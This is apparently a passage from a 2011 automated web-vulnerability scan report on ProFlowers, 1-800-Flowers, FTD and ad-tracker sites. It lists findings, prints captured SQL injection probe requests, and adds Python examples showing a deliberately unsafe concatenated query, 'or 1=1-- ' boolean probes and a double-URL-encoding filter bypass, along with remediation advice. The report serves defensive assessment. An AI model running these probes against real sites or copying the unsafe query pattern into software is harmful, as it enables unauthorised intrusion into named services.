4.174. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

4.175. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx [trackingpgroup parameter]

4.176. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx [trackingpgroup parameter]

4.177. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx [trackingpgroup parameter]

4.178. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx [trackingpgroup parameter]

4.179. https://orders.proflowers.com/OrderProcess/Order.aspx [trackingpgroup parameter]

4.180. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

4.181. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [Ref parameter]

4.182. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [tile parameter]

4.183. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [trackingpgroup parameter]

4.184. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [Ref parameter]

4.185. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [tile parameter]

4.186. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [trackingpgroup parameter]

4.187. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [viewpos parameter]

4.188. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [Ref parameter]

4.189. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [tile parameter]

4.190. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [trackingpgroup parameter]

4.191. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [viewpos parameter]

4.192. http://sales.liveperson.net/hc/87011923/ [msessionkey parameter]

4.193. http://www.proflowers.com/house-plants-PBS [tile parameter]

4.194. http://www.proflowers.com/mothers-day-flowers-MDF [tile parameter]

4.195. http://www.proflowers.com/send-flowers-bsl [tile parameter]

4.196. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [PFC_BrowserId cookie]

4.197. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [PFC_BrowserId cookie]

4.198. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [PFC_BrowserId cookie]

4.199. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.200. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

4.201. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

4.202. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.203. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.204. http://ww30.1800baskets.com/template.do [ShopperManagerEnterprise cookie]

4.205. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]

4.206. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]

4.207. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]

4.208. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]

4.209. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.210. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.211. https://ww30.1800flowers.com/checkoutsignin.do [ShopperManagerEnterprise cookie]

4.212. https://ww30.1800flowers.com/continueasguest.do [ShopperManagerEnterprise cookie]

5. Flash cross-domain policy

5.1. http://ad.doubleclick.net/crossdomain.xml

5.2. http://ads.undertone.com/crossdomain.xml

5.3. http://adsfac.us/crossdomain.xml

5.4. http://at.amgdgt.com/crossdomain.xml

5.5. http://b.scorecardresearch.com/crossdomain.xml

5.6. http://blooms.1800flowers.com/crossdomain.xml

5.7. http://bp.specificclick.net/crossdomain.xml

5.8. http://data.cmcore.com/crossdomain.xml

5.9. http://ib.adnxs.com/crossdomain.xml

5.10. http://idcs.interclick.com/crossdomain.xml

5.11. http://metrics.ftd.com/crossdomain.xml

5.12. http://pix04.revsci.net/crossdomain.xml

5.13. http://pixel.fetchback.com/crossdomain.xml

5.14. http://pixel.quantserve.com/crossdomain.xml

5.15. http://recs.richrelevance.com/crossdomain.xml

5.16. http://segment-pixel.invitemedia.com/crossdomain.xml

5.17. http://wa.proflowers.com/crossdomain.xml

5.18. http://googleads.g.doubleclick.net/crossdomain.xml

5.19. http://static.ak.fbcdn.net/crossdomain.xml

5.20. http://w.sharethis.com/crossdomain.xml

5.21. http://www.facebook.com/crossdomain.xml

5.22. http://www.ftd.com/crossdomain.xml

5.23. http://www.res-x.com/crossdomain.xml

5.24. http://www.proflowers.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.3. http://metrics.ftd.com/clientaccesspolicy.xml

6.4. http://wa.proflowers.com/clientaccesspolicy.xml

7. Cleartext submission of password

8. SSL cookie without secure flag set

8.1. https://accounts.proflowers.com/Default.aspx

8.2. https://ww30.1800flowers.com/checkoutsignin.do

8.3. https://ww30.1800flowers.com/continueasguest.do

8.4. https://accounts.proflowers.com/CustomerLogin.aspx

9. Session token in URL

9.1. http://l.sharethis.com/pview

9.2. http://sales.liveperson.net/hc/87011923/

9.3. http://t.p.mybuys.com/webrec/wr.do

10. Password field submitted using GET method

10.1. http://www.ftd.com/

10.2. http://www.ftd.com/

11. Open redirection

11.1. http://ad.trafficmp.com/a/bpix [r parameter]

11.2. http://pix04.revsci.net/K10145/a3/0/3/pg.302 [tgt parameter]

12. Cookie scoped to parent domain

12.1. http://ww30.1800baskets.com/include/cookieCloner.asp

12.2. http://ww30.1800flowers.com/

12.3. http://www.cherrymoonfarms.com/default.aspx

12.4. http://www.personalcreations.com/default.aspx

12.5. http://www.proflowers.com/

12.6. http://www.proflowers.com/house-plants-PBS

12.7. http://www.proflowers.com/mothers-day-flowers-MDF

12.8. http://www.proflowers.com/send-flowers-bsl

12.9. https://accounts.proflowers.com/CustomerLogin.aspx

12.10. https://accounts.proflowers.com/Default.aspx

12.11. http://ad.trafficmp.com/a/bpix

12.12. http://ads.revsci.net/adserver/ako

12.13. http://ads.revsci.net/adserver/ako

12.14. http://ads.revsci.net/adserver/ako

12.15. http://ads.revsci.net/adserver/ako

12.16. http://ads.revsci.net/adserver/ako

12.17. http://ads.revsci.net/adserver/ako

12.18. http://ads.revsci.net/adserver/ako

12.19. http://at.amgdgt.com/ads/

12.20. http://b.scorecardresearch.com/b

12.21. http://ib.adnxs.com/seg

12.22. http://idcs.interclick.com/Segment.aspx

12.23. http://leadback.advertising.com/adcedge/lb

12.24. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

12.25. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.26. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.27. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.28. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.29. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.30. http://pixel.fetchback.com/serve/fb/pdc

12.31. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

12.32. http://pixel.rubiconproject.com/tap.php

12.33. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

12.34. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

12.35. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

12.36. http://segment-pixel.invitemedia.com/pixel

12.37. http://t.p.mybuys.com/webrec/wr.do

12.38. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

12.39. http://www.ftd.com/351

13. Cookie without HttpOnly flag set

13.1. http://blooms.1800flowers.com/cm

13.2. http://t.p.mybuys.com/webrec/wr.do

13.3. http://ww30.1800baskets.com/deliverycalendarnew.do

13.4. http://ww30.1800baskets.com/include/cookieCloner.asp

13.5. http://ww30.1800baskets.com/shoppingbasket.do

13.6. http://ww30.1800baskets.com/template.do

13.7. http://ww30.1800flowers.com/

13.8. http://ww30.1800flowers.com/collection.do

13.9. http://ww30.1800flowers.com/deliverycalendarnew.do

13.10. http://ww30.1800flowers.com/guidedmodel.do

13.11. http://ww30.1800flowers.com/product.do

13.12. http://ww30.1800flowers.com/shoppingbasket.do

13.13. https://ww30.1800flowers.com/checkoutsignin.do

13.14. https://ww30.1800flowers.com/continueasguest.do

13.15. http://www.cherrymoonfarms.com/default.aspx

13.16. http://www.personalcreations.com/default.aspx

13.17. http://www.proflowers.com/

13.18. http://www.proflowers.com/house-plants-PBS

13.19. http://www.proflowers.com/mothers-day-flowers-MDF

13.20. http://www.proflowers.com/send-flowers-bsl

13.21. https://accounts.proflowers.com/CustomerLogin.aspx

13.22. https://accounts.proflowers.com/Default.aspx

13.23. http://ad.trafficmp.com/a/bpix

13.24. http://ad.yieldmanager.com/pixel

13.25. http://ads.revsci.net/adserver/ako

13.26. http://ads.revsci.net/adserver/ako

13.27. http://ads.revsci.net/adserver/ako

13.28. http://ads.revsci.net/adserver/ako

13.29. http://ads.revsci.net/adserver/ako

13.30. http://ads.revsci.net/adserver/ako

13.31. http://ads.revsci.net/adserver/ako

13.32. http://ads.undertone.com/fc.php

13.33. http://at.amgdgt.com/ads/

13.34. http://b.scorecardresearch.com/b

13.35. http://blooms.1800flowers.com/cm

13.36. http://ftd.com/

13.37. http://idcs.interclick.com/Segment.aspx

13.38. http://leadback.advertising.com/adcedge/lb

13.39. http://login.dotomi.com/ucm/UCMController

13.40. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

13.41. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.42. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.43. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.44. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.45. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.46. http://pixel.fetchback.com/serve/fb/pdc

13.47. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

13.48. http://pixel.rubiconproject.com/tap.php

13.49. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

13.50. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

13.51. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

13.52. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.53. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.54. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.55. http://segment-pixel.invitemedia.com/pixel

13.56. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

13.57. http://www.ftd.com/351

14. Password field with autocomplete enabled

14.1. https://accounts.proflowers.com/CustomerLogin.aspx

14.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

14.3. http://ww30.1800baskets.com/product.do

14.4. https://ww30.1800flowers.com/checkoutsignin.do

14.5. http://www.ftd.com/

14.6. http://www.ftd.com/

14.7. http://www.ftd.com/

14.8. http://www.ftd.com/

14.9. http://www.ftd.com/

15. Referer-dependent response

15.1. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

15.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx

15.3. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx

15.4. http://www.facebook.com/plugins/like.php

16. Cross-domain Referer leakage

16.1. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js

16.2. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js

16.3. https://accounts.proflowers.com/CustomerLogin.aspx

16.4. https://accounts.proflowers.com/Default.aspx

16.5. http://adsfac.us/pct_mx.asp

16.6. http://adsfac.us/pct_mx.asp

16.7. http://adsfac.us/pct_mx.asp

16.8. http://bp.specificclick.net/

16.9. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

16.10. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

16.11. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

16.12. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

16.13. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

16.14. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

16.15. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

16.16. http://pixel.fetchback.com/serve/fb/pdc

16.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

16.18. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

16.19. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

16.20. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

16.21. http://ww30.1800baskets.com/deliverycalendarnew.do

16.22. http://ww30.1800baskets.com/product.do

16.23. http://ww30.1800baskets.com/template.do

16.24. http://ww30.1800flowers.com/collection.do

16.25. http://ww30.1800flowers.com/product.do

16.26. http://www.cherrymoonfarms.com/default.aspx

16.27. http://www.facebook.com/plugins/like.php

16.28. http://www.personalcreations.com/default.aspx

16.29. http://www.proflowers.com/default.aspx

16.30. http://www.proflowers.com/house-plants-PBS

16.31. http://www.proflowers.com/mothers-day-flowers-MDF

16.32. http://www.proflowers.com/send-flowers-bsl

17. Cross-domain script include

17.1. https://accounts.proflowers.com/CustomerLogin.aspx

17.2. https://accounts.proflowers.com/Default.aspx

17.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

17.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

17.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

17.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

17.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

17.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

17.9. http://pixel.fetchback.com/serve/fb/pdc

17.10. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

17.11. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

17.12. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

17.13. http://ww30.1800baskets.com/deliverycalendarnew.do

17.14. http://ww30.1800baskets.com/product.do

17.15. http://ww30.1800baskets.com/shoppingbasket.do

17.16. http://ww30.1800baskets.com/template.do

17.17. http://ww30.1800flowers.com/

17.18. http://ww30.1800flowers.com/collection.do

17.19. http://ww30.1800flowers.com/product.do

17.20. http://ww30.1800flowers.com/shoppingbasket.do

17.21. https://ww30.1800flowers.com/checkoutsignin.do

17.22. https://ww30.1800flowers.com/continueasguest.do

17.23. http://www.cherrymoonfarms.com/default.aspx

17.24. http://www.facebook.com/plugins/like.php

17.25. http://www.ftd.com/

17.26. http://www.personalcreations.com/default.aspx

17.27. http://www.proflowers.com/

17.28. http://www.proflowers.com/default.aspx

17.29. http://www.proflowers.com/house-plants-PBS

17.30. http://www.proflowers.com/mothers-day-flowers-MDF

17.31. http://www.proflowers.com/send-flowers-bsl

18. TRACE method is enabled

18.1. http://att.adpxpx.com/

18.2. http://bp.specificclick.net/

18.3. http://metrics.ftd.com/

18.4. http://pixel.fetchback.com/

18.5. http://pixel.rubiconproject.com/

19. Email addresses disclosed

19.1. http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/calendar/date.js

19.2. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.css

19.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.js

19.4. https://ww30.1800flowers.com/checkoutsignin.do

19.5. http://www.ftd.com/

20. Private IP addresses disclosed

20.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

20.2. http://www.facebook.com/plugins/like.php

20.3. http://www.facebook.com/plugins/like.php

20.4. http://www.facebook.com/plugins/like.php

21. Robots.txt file

21.1. http://ad.doubleclick.net/activity

21.2. http://ads.undertone.com/fc.php

21.3. http://adsfac.us/pct_mx.asp

21.4. http://at.amgdgt.com/ads/

21.5. http://b.scorecardresearch.com/b

21.6. http://blooms.1800flowers.com/cm

21.7. http://data.cmcore.com/cookie-id.js

21.8. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

21.9. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1014041578/

21.10. http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico

21.11. http://media4.1800flowers.com/800f_assets/jet/website/styles/baskets/martha-tab_sep.css

21.12. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html

21.13. http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/favicon.ico

21.14. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

21.15. http://pixel.fetchback.com/serve/fb/pdc

21.16. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

21.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

21.18. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1oYDINqGAyoFWsMAAAEyBVbDAAAP

21.19. http://safebrowsing.clients.google.com/safebrowsing/gethash

21.20. http://segment-pixel.invitemedia.com/pixel

21.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

21.22. http://t.p.mybuys.com/webrec/wr.do

21.23. http://toolbarqueries.clients.google.com/tbproxy/af/query

21.24. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

21.25. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

21.26. http://ww30.1800baskets.com/include/cookieCloner.asp

21.27. http://ww30.1800flowers.com/

21.28. https://ww30.1800flowers.com/checkoutsignin.do

21.29. http://www.facebook.com/plugins/like.php

21.30. http://www.ftd.com/

21.31. http://www.google-analytics.com/__utm.gif

21.32. http://www.googleadservices.com/pagead/conversion/1014041578/

21.33. http://www.proflowers.com/

21.34. http://www.res-x.com/ws/r2/Resonance.aspx

22. Cacheable HTTPS response

22.1. https://accounts.proflowers.com/CustomerLogin.aspx

22.2. https://accounts.proflowers.com/Default.aspx

22.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

22.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

22.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

22.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

22.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

22.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

23. HTML does not specify charset

23.1. http://a1128.g.akamai.net/favicon.ico

23.2. http://adsfac.us/pct_mx.asp

23.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html

23.4. http://recs.richrelevance.com/favicon.ico

23.5. http://www.ftd.com/

23.6. http://www.ftd.com/empty/index.epl

23.7. http://www.ftd.com/empty/tealeaf.epl

24. Content type incorrectly stated

24.1. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

24.2. http://sales.liveperson.net/hcp/html/mTag.js

24.3. http://www.res-x.com/ws/r2/Resonance.aspx

25. SSL certificate

25.1. https://orders.proflowers.com/

25.2. https://ww30.1800flowers.com/



1. SQL injection
There are 24 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
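The following is an added example, not code from this report or from any of the sites it tests, showing the two query-building styles side by side and the boolean probe that findings 1.3 and 1.4 rely on. The product table, its rows and the base codes are constructed for the example; the report shows nothing about the real schema. It uses SQLite from the Python standard library so it runs offline.

```python
import sqlite3
from typing import Callable, List, Tuple

# Constructed sample rows standing in for the application's product table.
# The schema is an assumption for this example; the report shows no database details.
PRODUCTS: List[Tuple[int, str, float]] = [
    (91637, "Fields of Europe for Spring", 59.99),
    (93260, "The Popcorn Factory Birthday", 34.99),
    (99999, "Unpublished test item", 0.0),
]


def build_db() -> sqlite3.Connection:
    """In-memory SQLite database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (base_code INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?)", PRODUCTS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, base_code: str) -> list:
    """Deliberately unsafe: the untrusted value is spliced into the query text,
    so a payload such as "91637 or 1=1-- " rewrites the WHERE clause."""
    sql = "SELECT base_code, name FROM product WHERE base_code = " + base_code
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn: sqlite3.Connection, base_code: str) -> list:
    """Safe: the query structure is fixed before the value is bound, so the whole
    string is compared as data and can never alter the WHERE clause."""
    sql = "SELECT base_code, name FROM product WHERE base_code = ?"
    return conn.execute(sql, (base_code,)).fetchall()


Lookup = Callable[[sqlite3.Connection, str], list]


def boolean_probe_differs(lookup: Lookup, conn: sqlite3.Connection, value: str) -> bool:
    """The difference-based test reported in findings 1.3 and 1.4: append an
    always-true and an always-false condition to a known-good value and compare
    the two results. A query that treats its input as data answers both probes
    identically; a query that splices the input into SQL answers them differently."""
    true_case = lookup(conn, value + " or 1=1-- ")
    false_case = lookup(conn, value + " or 1=2-- ")
    return true_case != false_case


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, 1=1 probe  :", lookup_vulnerable(db, "91637 or 1=1-- "))
    print("vulnerable, 1=2 probe  :", lookup_vulnerable(db, "91637 or 1=2-- "))
    print("parameterised, probe   :", lookup_parameterised(db, "91637 or 1=1-- "))
    print("vulnerable differs     :", boolean_probe_differs(lookup_vulnerable, db, "91637"))
    print("parameterised differs  :", boolean_probe_differs(lookup_parameterised, db, "91637"))
```

Against the concatenated query the 1=1 probe returns every row and the 1=2 probe only the matching one, which is exactly the response difference the scanner keys on. Against the parameterised query both probes return nothing, because the bound string "91637 or 1=1-- " is compared as a value, not parsed as SQL. The same boolean probe therefore doubles as a regression check after a fix: it must report no difference.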

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. In this instance the "general error message" is the Apache Tomcat 6.0.18 404 page for the non-existent path /rrserver'/p13n_generated.js, and the two-quote follow-up received an empty 400 Bad Request from nginx with no Tomcat error page at all, so the change in response is explained by path handling rather than by a database error. Treat this as a probable false positive unless a database-specific error string can be provoked.

Request 1

GET /rrserver'/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903463511&p=%7C91637%7C93260&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Ccart_page.bottom&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%; vihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C; pvihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C73.1303848202747.21158348%7C

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:53 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 1036

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /rrserver''/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903463511&p=%7C91637%7C93260&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Ccart_page.bottom&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%; vihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C; pvihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C73.1303848202747.21158348%7C

Response 2

HTTP/1.1 400 Bad Request
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:53 GMT
Connection: keep-alive
Content-Length: 0


1.2. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As in 1.1, the "error message" here is the Tomcat 404 page for a path that does not exist and the follow-up is an empty 400 Bad Request, so the difference is explained by path handling rather than by a database error.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character. This inference rests on the %2527 and %2527%2527 probes producing the same 404/400 pair that the plain ' and '' probes produced in 1.1; nothing in the captured exchanges shows a filter rejecting the plain quote or treating the double-encoded one differently, so the bypass claim is not substantiated by this traffic and should be confirmed manually.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
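To make the ordering point concrete, here is an added example (not code from the report or from the service under test) that models the decode-then-validate chain the remediation describes. The blocked-character list and the three handler variants are assumptions for the example; the only fact taken from the report is that a web server URL-decodes a path segment once before the application sees it.

```python
from typing import Tuple
from urllib.parse import unquote

# Characters the hypothetical application filter refuses. This list is an
# assumption for the example; the report does not show what the real filter blocks.
BLOCKED = ("'", '"', ";", "--")


def server_decode(wire_segment: str) -> str:
    """The single URL-decode a web server applies to a path segment before
    handing it to the application. %2527 on the wire becomes %27 here."""
    return unquote(wire_segment)


def is_clean(segment: str) -> bool:
    """True when none of the blocked tokens appear in the segment as given."""
    return not any(token in segment for token in BLOCKED)


def handle_validate_then_decode(wire_segment: str) -> Tuple[bool, str]:
    """Broken order: validate the server-decoded value, then decode it again.
    %2527 arrives as %27, passes the filter, and only then turns into a quote.
    Returns (accepted, value the back end would receive)."""
    once = server_decode(wire_segment)
    if not is_clean(once):
        return False, once
    canonical = unquote(once)  # the application's own, second decode
    return True, canonical


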